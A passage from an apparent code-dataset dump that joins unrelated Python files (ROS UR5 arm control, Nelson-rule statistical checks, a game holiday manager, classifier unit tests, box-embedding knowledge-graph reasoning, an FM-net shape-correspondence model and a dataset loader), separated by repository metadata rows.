'\033[94m' + ">>> go_to_pose() Failed. Solution for Pose not Found." + '\033[0m')
return flag_plan
def hard_go_to_pose(self, arg_pose, arg_max_attempts):
"""
This function calls go_to_pose() function multiple time until it succeed or reaches maximum attempt limit.
:param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
:param arg_max_attempts: maximum attempts for calling go_to_pose()
:return: boolean
"""
number_attempts = 0
flag_success = False
while (number_attempts <= arg_max_attempts) and (flag_success is False):
number_attempts += 1
flag_success = self.go_to_pose(arg_pose)
rospy.logwarn("attempts: {}".format(number_attempts) )
return flag_success
def clear_octomap(self):
clear_octomap_service_proxy = rospy.ServiceProxy(self._robot_ns + "/clear_octomap", Empty)
return clear_octomap_service_proxy()
def set_joint_angles(self, arg_list_joint_angles):
"""
This function sets angle of each joint of ur5 to reach a specific position.
:param arg_list_joint_angles: list of joints
:return: boolean
"""
self._group.set_joint_value_target(arg_list_joint_angles)
self._computed_plan = self._group.plan()
flag_plan = self._group.go(wait=True)
if flag_plan:
rospy.loginfo(
'\033[94m' + ">>> set_joint_angles() Success" + '\033[0m')
else:
rospy.logerr(
'\033[94m' + ">>> set_joint_angles() Failed." + '\033[0m')
return flag_plan
def hard_set_joint_angles(self, arg_list_joint_angles, arg_max_attempts):
"""
This function calls set_joint_angles() multiple times until it succeed or reaches maximum attempt limit
:param arg_list_joint_angles: list of all joint angles
:param arg_max_attempts: maximum attempt
:return: boolean
"""
number_attempts = 0
flag_success = False
while (number_attempts <= arg_max_attempts) and (flag_success is False):
number_attempts += 1
flag_success = self.set_joint_angles(arg_list_joint_angles)
rospy.logwarn("attempts: {}".format(number_attempts) )
# self.clear_octomap()
return flag_success
def trigger_converbelt(self,value):
"""
this function sets belt speed using ros service
:param value: value of speed.
:return: null
"""
x = rospy.ServiceProxy('eyrc/vb/conveyor/set_power', conveyorBeltPowerMsg)
y = x(value)
print(y)
self.is_conver_active = value
def __del__(self):
"""
Destructor
:return: null
"""
moveit_commander.roscpp_shutdown()
rospy.loginfo(
'\033[94m' + "Object of class ur5_moveit Deleted." + '\033[0m')
| 169 | 0 | 53 |
8145aa16391086be18b4c1e44f2aca985e32f12d | 8,452 | py | Python | diligent/checks/nelson.py | stefanw/diligent-pandas | aaf74fc41bc9414e5e27f5a0e1b91d47613fdb38 | [
"MIT"
] | 3 | 2016-05-13T00:45:40.000Z | 2019-07-30T15:22:29.000Z | diligent/checks/nelson.py | stefanw/diligent-pandas | aaf74fc41bc9414e5e27f5a0e1b91d47613fdb38 | [
"MIT"
] | null | null | null | diligent/checks/nelson.py | stefanw/diligent-pandas | aaf74fc41bc9414e5e27f5a0e1b91d47613fdb38 | [
"MIT"
] | 1 | 2019-02-16T01:39:04.000Z | 2019-02-16T01:39:04.000Z | """
Implementation of the Nelson rules
https://en.wikipedia.org/wiki/Nelson_rules
"""
from collections import deque
import numpy as np
from ..diligent import registry
from ..utils import is_numeric
__all__ = ['nelson_rule_%d' % i for i in range(1, 9)]
@registry.register(name='Nelson Rule 1', tags='nelson')
@registry.register(name='Nelson Rule 2', tags='nelson')
@registry.register(name='Nelson Rule 3', tags='nelson')
@registry.register(name='Nelson Rule 4', tags='nelson')
@registry.register(name='Nelson Rule 5', tags='nelson')
@registry.register(name='Nelson Rule 6', tags='nelson')
@registry.register(name='Nelson Rule 7', tags='nelson')
@registry.register(name='Nelson Rule 8', tags='nelson')
| 31.303704 | 116 | 0.587317 | """
Implementation of the Nelson rules
https://en.wikipedia.org/wiki/Nelson_rules
"""
from collections import deque
import numpy as np
from ..diligent import registry
from ..utils import is_numeric
__all__ = ['nelson_rule_%d' % i for i in range(1, 9)]
@registry.register(name='Nelson Rule 1', tags='nelson')
def nelson_rule_1(series, std_mult=3, mean=None, std=None):
if not is_numeric(series):
return
message_inc = 'At {}: {} is three standard deviations above the mean of {}'
message_dec = 'At {}: {} is three standard deviations below the mean of {}'
if mean is None:
mean = series.mean()
if std is None:
std = series.std()
three_std = std_mult * std
for i, x in series[series >= mean + three_std].iteritems():
yield message_inc.format(i, x, mean)
for i, x in series[series <= mean - three_std].iteritems():
yield message_dec.format(i, x, mean)
@registry.register(name='Nelson Rule 2', tags='nelson')
def nelson_rule_2(series, threshold=9, mean=None):
if not is_numeric(series):
return
message_below = 'At {}: {} data points in sequence are below the mean of {}'
message_above = 'At {}: {} data points in sequence are above the mean of {}'
if mean is None:
mean = series.mean()
above_counter = 0
first_trend = None
below_counter = 0
for i, x in series.iteritems():
if x > mean:
if below_counter >= threshold:
yield message_below.format(
first_trend, below_counter, mean)
below_counter = 0
if above_counter == 0:
first_trend = i
above_counter += 1
elif x < mean:
if above_counter >= threshold:
yield message_above.format(
first_trend, above_counter, mean)
above_counter = 0
if below_counter == 0:
first_trend = i
below_counter += 1
else:
below_counter = 0
above_counter = 0
if above_counter >= threshold:
yield message_above.format(
first_trend, above_counter, mean)
if below_counter >= threshold:
yield message_below.format(
first_trend, below_counter, mean)
@registry.register(name='Nelson Rule 3', tags='nelson')
def nelson_rule_3(series, threshold=6):
if not is_numeric(series):
return
message_inc = 'At {}: {} data points in sequence are increasing'
message_dec = 'At {}: {} data points in sequence are decreasing'
trend_counter = 0
last_value = None
last_index = None
first_row = None
current_trend = None
for i, x in series.iteritems():
if last_value is None:
last_value = x
last_index = i
continue
trend = np.sign(x - last_value)
if trend != current_trend:
if trend_counter >= threshold:
if current_trend > 0:
yield message_inc.format(
first_row, trend_counter)
elif current_trend < 0:
yield message_dec.format(
first_row, trend_counter)
first_row = last_index
trend_counter = 1 # the first point was in last iteration
current_trend = np.sign(x - last_value)
last_value = x
last_index = i
if trend == 0:
continue
trend_counter += 1
if trend_counter >= threshold:
if current_trend > 0:
yield message_inc.format(
first_row, trend_counter)
elif current_trend < 0:
yield message_dec.format(
first_row, trend_counter)
@registry.register(name='Nelson Rule 4', tags='nelson')
def nelson_rule_4(series, threshold=14):
if not is_numeric(series):
return
message = 'At {}: {} data points in sequence alternate in direction'
current_trend = 0
trend_counter = 0
values = deque([], 3)
indizes = deque([], 3)
first_index = None
for i, x in series.iteritems():
values.append(x)
indizes.append(i)
if len(values) < 2:
continue
trend = np.sign(x - values[-2])
# Increasing (1) + decreasing (-1) == 0
alternation = current_trend + trend == 0
if first_index is None and alternation:
first_index = indizes[0]
trend_counter = 3 # Trend started two rows before
elif first_index is not None and alternation:
trend_counter += 1
elif first_index is not None and not alternation:
if trend_counter >= threshold:
yield message.format(
first_index, trend_counter)
first_index = None
current_trend = trend
if first_index is not None and trend_counter >= threshold:
yield message.format(
first_index, trend_counter)
def nelson_rule_5_6(series, std_mult=2, window=3, threshold=2,
mean=None, std=None):
if not is_numeric(series):
return
if mean is None:
mean = series.mean()
if std is None:
std = series.std()
x_std = std_mult * std
indizes = deque([], window)
values = deque([], window)
for i, x in series.iteritems():
indizes.append(i)
values.append(x)
if len(indizes) < window:
continue
count_above = len([v for v in values if v > mean + x_std])
if count_above >= threshold:
yield 'At {}: {} out of {} points in a row are more than {} standard deviations above the mean.'.format(
indizes[0], count_above, window, std_mult)
count_below = len([v for v in values if v < mean - x_std])
if count_below >= threshold:
yield 'At {}: {} out of {} points in a row are more than {} standard deviations below the mean.'.format(
indizes[0], count_below, window, std_mult)
@registry.register(name='Nelson Rule 5', tags='nelson')
def nelson_rule_5(series, mean=None, std=None):
return nelson_rule_5_6(series, std_mult=2, window=3, threshold=2,
mean=mean, std=std)
@registry.register(name='Nelson Rule 6', tags='nelson')
def nelson_rule_6(series, mean=None, std=None):
return nelson_rule_5_6(series, std_mult=1, window=5, threshold=4,
mean=mean, std=std)
def nelson_rule_7_8(series, std_mult=1, window=15, threshold=15, cmp=None,
message=None, mean=None, std=None):
if not is_numeric(series):
return
if mean is None:
mean = series.mean()
if std is None:
std = series.std()
x_std = std_mult * std
below = mean - x_std
above = mean + x_std
indizes = deque([], window)
values = deque([], window)
first_index = None
count = 0
for i, x in series.iteritems():
indizes.append(i)
values.append(x)
if len(indizes) < window:
continue
count_within = len([v for v in values if cmp(below, v, above)])
if first_index is None and count_within >= threshold:
first_index = indizes[0]
count = count_within
elif first_index is not None and count_within >= threshold:
count += 1
elif first_index is not None:
yield message.format(
first_index, count)
first_index = None
count = 0
if count > 0:
yield message.format(
first_index, count)
@registry.register(name='Nelson Rule 7', tags='nelson')
def nelson_rule_7(series, mean=None, std=None):
return nelson_rule_7_8(series, std_mult=1, window=15, threshold=15,
cmp=lambda b, v, a: b <= v <= a,
message='At {}: {} points in a row are all within 1 standard '
'deviation of the mean on either side of the mean.',
mean=mean, std=std)
@registry.register(name='Nelson Rule 8', tags='nelson')
def nelson_rule_8(series, mean=None, std=None):
return nelson_rule_7_8(series, std_mult=1, window=8, threshold=8,
cmp=lambda b, v, a: v < b or v > a,
message='At {}: {} points in a row exist with none within 1 '
'standard deviation of the mean and the points are in both '
'directions from the mean.',
mean=mean, std=std)
| 7,508 | 0 | 222 |
907e0adfc0f120310bcbdc9d52f4a37f02b73a76 | 1,259 | py | Python | lib/coginvasion/holiday/HolidayManager.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | 1 | 2020-03-12T16:44:10.000Z | 2020-03-12T16:44:10.000Z | lib/coginvasion/holiday/HolidayManager.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | lib/coginvasion/holiday/HolidayManager.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.holiday.HolidayManager
from panda3d.core import VirtualFileSystem, Filename
from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.directnotify.DirectNotifyGlobal import directNotify
| 34.972222 | 104 | 0.732327 | # uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.holiday.HolidayManager
from panda3d.core import VirtualFileSystem, Filename
from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.directnotify.DirectNotifyGlobal import directNotify
class HolidayType:
CHRISTMAS = 1
HALLOWEEN = 2
class HolidayGlobals:
CHRISTMAS_TIME = 'Happy Winter Holidays! Winter has struck Toontown!'
COACH_GREETING = 'Happy Holidays, %s! Here, take some snowballs!'
class HolidayManager(DistributedObjectGlobal):
notify = directNotify.newCategory('HolidayManager')
def __init__(self, cr):
DistributedObjectGlobal.__init__(self, cr)
def announceGenerate(self):
DistributedObjectGlobal.announceGenerate(self)
self.sendUpdate('requestHoliday', [])
def setHoliday(self, holiday):
self.holiday = holiday
if holiday == HolidayType.CHRISTMAS:
vfs = VirtualFileSystem.getGlobalPtr()
vfs.mount(Filename('winter.mf'), '.', VirtualFileSystem.MFReadOnly)
def getHoliday(self):
return self.holiday | 404 | 366 | 69 |
0d4bdc468aa1a1f9a81f77398ae0f99cd3a04ab0 | 4,525 | py | Python | discomll/tests/tests_classification.py | romanorac/discomll | a4703daffb2ba3c9f614bc3dbe45ae55884aea00 | [
"Apache-2.0"
] | 103 | 2015-01-02T23:45:18.000Z | 2021-01-23T14:25:52.000Z | discomll/tests/tests_classification.py | romanorac/discomll | a4703daffb2ba3c9f614bc3dbe45ae55884aea00 | [
"Apache-2.0"
] | null | null | null | discomll/tests/tests_classification.py | romanorac/discomll | a4703daffb2ba3c9f614bc3dbe45ae55884aea00 | [
"Apache-2.0"
] | 10 | 2015-01-02T23:48:12.000Z | 2017-11-25T15:55:34.000Z | import unittest
import numpy as np
import Orange
from disco.core import result_iterator
import datasets
if __name__ == '__main__':
unittest.main()
| 40.765766 | 119 | 0.699448 | import unittest
import numpy as np
import Orange
from disco.core import result_iterator
import datasets
class Tests_Classification(unittest.TestCase):
@classmethod
def setUpClass(self):
import chunk_testdata
from disco import ddfs
ddfs = ddfs.DDFS()
if not ddfs.exists("test:ex3"):
print "Chunking test datasets to DDFS..."
chunk_testdata.chunk_testdata()
def test_naivebayes_breastcancer(self):
# python -m unittest tests_classification.Tests_Classification.test_naivebayes_breastcancer
from discomll.classification import naivebayes
train_data1, test_data1 = datasets.breastcancer_disc_orange()
train_data2, test_data2 = datasets.breastcancer_disc_discomll()
for m in range(3):
learner = Orange.classification.bayes.NaiveLearner(m=m)
classifier = learner(train_data1)
predictions1 = [classifier(inst, Orange.classification.Classifier.GetBoth) for inst in test_data1]
predictions1_target = [v[0].value for v in predictions1]
predictions1_probs = [v[1].values() for v in predictions1]
fitmodel_url = naivebayes.fit(train_data2)
predictions_url = naivebayes.predict(test_data2, fitmodel_url, m=m)
predictions2_target = []
predictions2_probs = []
for k, v in result_iterator(predictions_url):
predictions2_target.append(v[0])
predictions2_probs.append(v[1])
self.assertListEqual(predictions1_target, predictions2_target)
self.assertTrue(np.allclose(predictions1_probs, predictions2_probs))
def test_naivebayes_breastcancer_cont(self):
# python -m unittest tests_classification.Tests_Classification.test_naivebayes_breastcancer_cont
from sklearn.naive_bayes import GaussianNB
from discomll.classification import naivebayes
x_train, y_train, x_test, y_test = datasets.breastcancer_cont(replication=1)
train_data, test_data = datasets.breastcancer_cont_discomll(replication=1)
clf = GaussianNB()
probs_log1 = clf.fit(x_train, y_train).predict_proba(x_test)
fitmodel_url = naivebayes.fit(train_data)
prediction_url = naivebayes.predict(test_data, fitmodel_url)
probs_log2 = [v[1] for _, v in result_iterator(prediction_url)]
self.assertTrue(np.allclose(probs_log1, probs_log2, atol=1e-8))
def test_log_reg_thetas(self):
# python tests_classification.py Tests_Classification.test_log_reg_thetas
from discomll.classification import logistic_regression
train_data1 = datasets.ex4_orange()
train_data2 = datasets.ex4_discomll()
lr = Orange.classification.logreg.LogRegFitter_Cholesky(train_data1)
thetas1 = lr[1]
thetas_url = logistic_regression.fit(train_data2)
thetas2 = [v for k, v in result_iterator(thetas_url["logreg_fitmodel"]) if k == "thetas"]
self.assertTrue(np.allclose(thetas1, thetas2))
def test_log_reg(self):
# python tests_classification.py Tests_Classification.test_log_reg
from discomll.classification import logistic_regression
train_data1, test_data1 = datasets.breastcancer_cont_orange()
train_data2, test_data2 = datasets.breastcancer_cont_discomll()
learner = Orange.classification.logreg.LogRegLearner(fitter=Orange.classification.logreg.LogRegFitter_Cholesky)
classifier = learner(train_data1)
thetas1 = classifier.beta
predictions1 = []
probabilities1 = []
for inst in test_data1:
target, probs = classifier(inst, Orange.classification.Classifier.GetBoth)
predictions1.append(target.value)
probabilities1.append(probs.values())
thetas_url = logistic_regression.fit(train_data2, alpha=1e-8, max_iterations=10)
thetas2 = [v for k, v in result_iterator(thetas_url["logreg_fitmodel"]) if k == "thetas"]
results_url = logistic_regression.predict(test_data2, thetas_url)
predictions2 = []
probabilities2 = []
for k, v in result_iterator(results_url):
predictions2.append(v[0])
probabilities2.append(v[1])
self.assertTrue(np.allclose(thetas1, thetas2))
self.assertTrue(np.allclose(probabilities1, probabilities2, atol=1e-5))
self.assertListEqual(predictions1, predictions2)
if __name__ == '__main__':
unittest.main()
| 4,170 | 176 | 23 |
8a2a0fe848a71d1e002a99358b587d9441c09903 | 7,400 | py | Python | smore/models/box.py | isabella232/smore | 02e5a89e84a805eed632eefbdecd957d95e202d4 | [
"Apache-2.0"
] | 78 | 2021-10-31T23:20:26.000Z | 2022-03-21T01:07:01.000Z | smore/models/box.py | google-research/smore | e4ba95a7466ef7d018987bce7688b77bf2ea7e4f | [
"Apache-2.0"
] | 4 | 2021-11-02T13:45:38.000Z | 2022-02-17T04:18:32.000Z | smore/models/box.py | pyg-team/smore | 02e5a89e84a805eed632eefbdecd957d95e202d4 | [
"Apache-2.0"
] | 15 | 2021-11-02T23:55:29.000Z | 2022-03-19T10:30:51.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import time
import pdb
from smore.models.kg_reasoning import KGReasoning
from smore.common.modules import Identity
from smore.common.embedding.sparse_embed import SparseEmbedding
from smore.common.torchext.ext_ops import box_dist_in, box_dist_out
| 44.848485 | 160 | 0.69 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import time
import pdb
from smore.models.kg_reasoning import KGReasoning
from smore.common.modules import Identity
from smore.common.embedding.sparse_embed import SparseEmbedding
from smore.common.torchext.ext_ops import box_dist_in, box_dist_out
class BoxOffsetIntersection(nn.Module):
def __init__(self, dim):
super(BoxOffsetIntersection, self).__init__()
self.dim = dim
self.layers = nn.Parameter(torch.zeros(self.dim*2+2, self.dim))
nn.init.xavier_uniform_(self.layers[:self.dim*2, :])
def forward(self, embeddings):
w1, w2, b1, b2 = torch.split(self.layers, [self.dim, self.dim, 1, 1], dim=0)
layer1_act = F.relu(F.linear(embeddings, w1, b1.view(-1)))
layer1_mean = torch.mean(layer1_act, dim=0)
gate = torch.sigmoid(F.linear(layer1_mean, w2, b2.view(-1)))
offset, _ = torch.min(embeddings, dim=0)
return offset * gate
class CenterIntersection(nn.Module):
def __init__(self, dim):
super(CenterIntersection, self).__init__()
self.dim = dim
self.layers = nn.Parameter(torch.zeros(self.dim*2+2, self.dim))
nn.init.xavier_uniform_(self.layers[:self.dim*2, :])
def forward(self, embeddings):
w1, w2, b1, b2 = torch.split(self.layers, [self.dim, self.dim, 1, 1], dim=0)
layer1_act = F.relu(F.linear(embeddings, w1, b1.view(-1))) # (num_conj, dim)
attention = F.softmax(F.linear(layer1_act, w2, b2.view(-1)), dim=0) # (num_conj, dim)
embedding = torch.sum(attention * embeddings, dim=0)
return embedding
class BoxReasoning(KGReasoning):
def __init__(self, nentity, nrelation, hidden_dim, gamma,
optim_mode, batch_size, test_batch_size=1, sparse_embeddings=None,
sparse_device='gpu', use_cuda=False, query_name_dict=None, box_mode=None,logit_impl='native'):
super(BoxReasoning, self).__init__(nentity=nentity, nrelation=nrelation, hidden_dim=hidden_dim,
gamma=gamma, optim_mode=optim_mode, batch_size=batch_size, test_batch_size=test_batch_size,
sparse_embeddings=sparse_embeddings, sparse_device=sparse_device, use_cuda=use_cuda, query_name_dict=query_name_dict,
logit_impl=logit_impl)
self.geo = 'box'
self.entity_embedding = SparseEmbedding(nentity, self.entity_dim)
activation, cen = box_mode
self.cen = cen # hyperparameter that balances the in-box distance and the out-box distance
if activation == 'none':
self.func = Identity
elif activation == 'relu':
self.func = F.relu
elif activation == 'softplus':
self.func = F.softplus
self.offset_embedding = SparseEmbedding(nrelation, self.entity_dim)
self.center_net = CenterIntersection(self.entity_dim)
self.offset_net = BoxOffsetIntersection(self.entity_dim)
self.num_embedding_component = 2
self.init_params()
def named_sparse_embeddings(self):
list_sparse = super(BoxReasoning, self).named_sparse_embeddings()
if 'r' in self.sparse_embeddings:
list_sparse.append(("offset_embedding", self.offset_embedding))
return list_sparse
def named_dense_embedding_params(self):
pgen = super(BoxReasoning, self).named_dense_embedding_params()
for name, param in pgen:
yield name, param
if 'r' not in self.sparse_embeddings:
for name, param in self.offset_embedding.named_parameters():
yield name, param
def to_device(self, device):
super(BoxReasoning, self).to_device(device)
self.center_net = self.center_net.to(device)
self.offset_net = self.offset_net.to(device)
self.zero_offset_tensor = torch.zeros([self.batch_size, 1, self.entity_dim]).to(device)
self.empty_logit_tensor = torch.tensor([]).to(device)
if 'r' not in self.sparse_embeddings or self.sparse_device == 'gpu':
self.offset_embedding = self.offset_embedding.cuda(device)
def init_params(self):
super(BoxReasoning, self).init_params()
self.offset_embedding.init_params(0, self.embedding_range)
def share_memory(self):
super(BoxReasoning, self).share_memory()
self.center_net.share_memory()
self.offset_net.share_memory()
self.offset_embedding.share_memory()
def relation_projection(self, cur_embedding, relation_ids):
relation_embedding = self.relation_embedding(relation_ids).unsqueeze(1)
offset_embedding = self.offset_embedding(relation_ids).unsqueeze(1)
return [cur_embedding[0] + relation_embedding, cur_embedding[1] + self.func(offset_embedding)]
def retrieve_embedding(self, entity_ids):
'''
Retrieve the entity embeddings given the entity indices
Params:
entity_ids: a list of entities indices
'''
embedding = self.entity_embedding(entity_ids)
offset_embedding = torch.zeros_like(embedding).to(embedding.device)
return [embedding.unsqueeze(1), offset_embedding.unsqueeze(1)]
def intersection_between_stacked_embedding(self, stacked_embedding_list):
embedding, offset_embedding = torch.chunk(stacked_embedding_list, 2, dim=-1)
embedding = self.center_net(embedding) # [32, 6, 16]
offset_embedding = self.offset_net(offset_embedding)
return [embedding, offset_embedding]
def native_cal_logit(self, entity_embedding, entity_feat, query_embedding):
assert entity_feat is None
query_center_embedding, query_offset_embedding = query_embedding
delta = (entity_embedding.unsqueeze(1) - query_center_embedding).abs()
distance_out = F.relu(delta - query_offset_embedding)
distance_in = torch.min(delta, query_offset_embedding)
logit = self.gamma - torch.norm(distance_out, p=1, dim=-1) - self.cen * torch.norm(distance_in, p=1, dim=-1)
logit = torch.max(logit, dim=1)[0]
return logit
def custom_cal_logit(self, entity_embedding, entity_feat, query_embedding):
assert entity_feat is None
query_center_embedding, query_offset_embedding = query_embedding
d1 = box_dist_out(entity_embedding, query_center_embedding, query_offset_embedding)
d2 = box_dist_in(entity_embedding, query_center_embedding, query_offset_embedding)
logit = self.gamma - d1 - self.cen * d2
logit = torch.max(logit, dim=1)[0]
return logit
| 5,460 | 720 | 181 |
b5ba6ef777fde42cecd1a31dc630290cdbebe0ef | 2,343 | py | Python | Learning Correspondence of Synthetic Shapes/models.py | tbredbenner/unsupervised_learning_of_dense_shape_correspondence | 440643d633a6db3f947ac71a247c8083cb3aeadc | [
"MIT"
] | 84 | 2019-03-16T13:08:25.000Z | 2022-02-06T11:11:39.000Z | Learning Correspondence of Synthetic Shapes/models.py | tbredbenner/unsupervised_learning_of_dense_shape_correspondence | 440643d633a6db3f947ac71a247c8083cb3aeadc | [
"MIT"
] | 11 | 2019-09-14T02:54:29.000Z | 2022-01-13T01:42:29.000Z | Learning Correspondence of Synthetic Shapes/models.py | tbredbenner/unsupervised_learning_of_dense_shape_correspondence | 440643d633a6db3f947ac71a247c8083cb3aeadc | [
"MIT"
] | 20 | 2019-06-22T09:01:37.000Z | 2021-07-09T08:24:13.000Z | import tensorflow as tf
import numpy as np
from ops import *
flags = tf.app.flags
FLAGS = flags.FLAGS
def fmnet_model(phase, part_shot, model_shot, part_dist_map , model_dist_map, part2model_ind_gt, part_evecs, part_evecs_trans, model_evecs, model_evecs_trans):
"""Build FM-net model.
Args:
phase: train\test.
part_shot: SHOT descriptor of source shape (part).
model_shot: SHOT descriptor of target shape (model).
dist_map: distance map on target shape to evaluate geodesic error
part_evecs: eigenvectors on source shape
part_evecs_trans: transposed part_evecs with mass matrix correction
model_evecs: eigenvectors on target shape
model_evecs_trans: transposed model_evecs with mass matrix correction
"""
net = {}
for i_layer in range(FLAGS.num_layers):
with tf.variable_scope("layer_%d" % i_layer) as scope:
if i_layer == 0:
net['layer_%d_part' % i_layer] = res_layer(part_shot, dims_out=int(part_shot.shape[-1]), scope=scope,
phase=phase)
scope.reuse_variables()
net['layer_%d_model' % i_layer] = res_layer(model_shot, dims_out=int(model_shot.shape[-1]), scope=scope,
phase=phase)
else:
net['layer_%d_part' % i_layer] = res_layer(net['layer_%d_part' % (i_layer - 1)],
dims_out=int(part_shot.shape[-1]),
scope=scope, phase=phase)
scope.reuse_variables()
net['layer_%d_model' % i_layer] = res_layer(net['layer_%d_model' % (i_layer - 1)],
dims_out=int(part_shot.shape[-1]),
scope=scope, phase=phase)
# project output features on the shape Laplacian eigen functions
layer_C_est = i_layer + 1 # grab current layer index
A = tf.matmul(part_evecs_trans, net['layer_%d_part' % (layer_C_est - 1)])
net['A'] = A
B = tf.matmul(model_evecs_trans, net['layer_%d_model' % (layer_C_est - 1)])
net['B'] = B
# FM-layer: evaluate C_est
net['C_est'], safeguard_inverse = solve_ls(A, B)
# Evaluate loss via soft-correspondence error
with tf.variable_scope("pointwise_corr_loss"):
P_norm, net_loss, unsupervised_loss = pointwise_corr_layer(net['C_est'], model_evecs, part_evecs_trans, model_dist_map, part_dist_map, part2model_ind_gt)
tf.summary.scalar('net_loss', net_loss)
merged = tf.summary.merge_all()
return net_loss, unsupervised_loss, safeguard_inverse, merged, P_norm, net | 38.409836 | 159 | 0.714469 | import tensorflow as tf
import numpy as np
from ops import *
flags = tf.app.flags
FLAGS = flags.FLAGS
def fmnet_model(phase, part_shot, model_shot, part_dist_map , model_dist_map, part2model_ind_gt, part_evecs, part_evecs_trans, model_evecs, model_evecs_trans):
"""Build FM-net model.
Args:
phase: train\test.
part_shot: SHOT descriptor of source shape (part).
model_shot: SHOT descriptor of target shape (model).
dist_map: distance map on target shape to evaluate geodesic error
part_evecs: eigenvectors on source shape
part_evecs_trans: transposed part_evecs with mass matrix correction
model_evecs: eigenvectors on target shape
model_evecs_trans: transposed model_evecs with mass matrix correction
"""
net = {}
for i_layer in range(FLAGS.num_layers):
with tf.variable_scope("layer_%d" % i_layer) as scope:
if i_layer == 0:
net['layer_%d_part' % i_layer] = res_layer(part_shot, dims_out=int(part_shot.shape[-1]), scope=scope,
phase=phase)
scope.reuse_variables()
net['layer_%d_model' % i_layer] = res_layer(model_shot, dims_out=int(model_shot.shape[-1]), scope=scope,
phase=phase)
else:
net['layer_%d_part' % i_layer] = res_layer(net['layer_%d_part' % (i_layer - 1)],
dims_out=int(part_shot.shape[-1]),
scope=scope, phase=phase)
scope.reuse_variables()
net['layer_%d_model' % i_layer] = res_layer(net['layer_%d_model' % (i_layer - 1)],
dims_out=int(part_shot.shape[-1]),
scope=scope, phase=phase)
# project output features on the shape Laplacian eigen functions
layer_C_est = i_layer + 1 # grab current layer index
A = tf.matmul(part_evecs_trans, net['layer_%d_part' % (layer_C_est - 1)])
net['A'] = A
B = tf.matmul(model_evecs_trans, net['layer_%d_model' % (layer_C_est - 1)])
net['B'] = B
# FM-layer: evaluate C_est
net['C_est'], safeguard_inverse = solve_ls(A, B)
# Evaluate loss via soft-correspondence error
with tf.variable_scope("pointwise_corr_loss"):
P_norm, net_loss, unsupervised_loss = pointwise_corr_layer(net['C_est'], model_evecs, part_evecs_trans, model_dist_map, part_dist_map, part2model_ind_gt)
tf.summary.scalar('net_loss', net_loss)
merged = tf.summary.merge_all()
return net_loss, unsupervised_loss, safeguard_inverse, merged, P_norm, net | 0 | 0 | 0 |
be06dc1fd3e896347775ceb768b0220fa17cdd42 | 8,091 | py | Python | xcenternet/datasets/mcod_dataset.py | JuanchoWang/xcenternet | 1b6784bb3ff8bc44704a60fc6fd0b56dea190e29 | [
"Apache-2.0",
"MIT"
] | null | null | null | xcenternet/datasets/mcod_dataset.py | JuanchoWang/xcenternet | 1b6784bb3ff8bc44704a60fc6fd0b56dea190e29 | [
"Apache-2.0",
"MIT"
] | null | null | null | xcenternet/datasets/mcod_dataset.py | JuanchoWang/xcenternet | 1b6784bb3ff8bc44704a60fc6fd0b56dea190e29 | [
"Apache-2.0",
"MIT"
] | null | null | null | from random import shuffle
import tensorflow as tf
from xcenternet.datasets.dataset import Dataset
class TfExampleFields(object):
"""TF-example proto feature names
Holds the standard feature names to load from an Example proto
Attributes:
image_encoded: image encoded as string
image_format: image format, e.g. "JPEG"
filename: filename
channels: number of channels of image
colorspace: colorspace, e.g. "RGB"
height: height of image in pixels, e.g. 462
width: width of image in pixels, e.g. 581
source_id: original source of the image
image_class_text: image-level label in text format
image_class_label: image-level label in numerical format
object_class_text: labels in text format, e.g. ["person", "cat"]
object_class_label: labels in numbers, e.g. [16, 8]
object_bbox_xmin: xmin coordinates of groundtruth box, e.g. 10, 30
object_bbox_xmax: xmax coordinates of groundtruth box, e.g. 50, 40
object_bbox_ymin: ymin coordinates of groundtruth box, e.g. 40, 50
object_bbox_ymax: ymax coordinates of groundtruth box, e.g. 80, 70
ignore_area_bbox_xmin: xmin coordinates of ignore box, e.g. 10, 30
ignore_area_bbox_xmax: xmax coordinates of ignore box, e.g. 50, 40
ignore_area_bbox_ymin: ymin coordinates of ignore box, e.g. 40, 50
ignore_area_bbox_ymax: ymax coordinates of ignore box, e.g. 80, 70
object_view: viewpoint of object, e.g. ["frontal", "left"]
object_truncated: is object truncated, e.g. [true, false]
object_occluded: is object occluded, e.g. [true, false]
object_difficult: is object difficult, e.g. [true, false]
object_group_of: is object a single object or a group of objects
object_depiction: is object a depiction
object_segment_area: the area of the segment.
object_weight: a weight factor for the object's bounding box.
instance_masks: instance segmentation masks.
instance_boundaries: instance boundaries.
instance_classes: Classes for each instance segmentation mask.
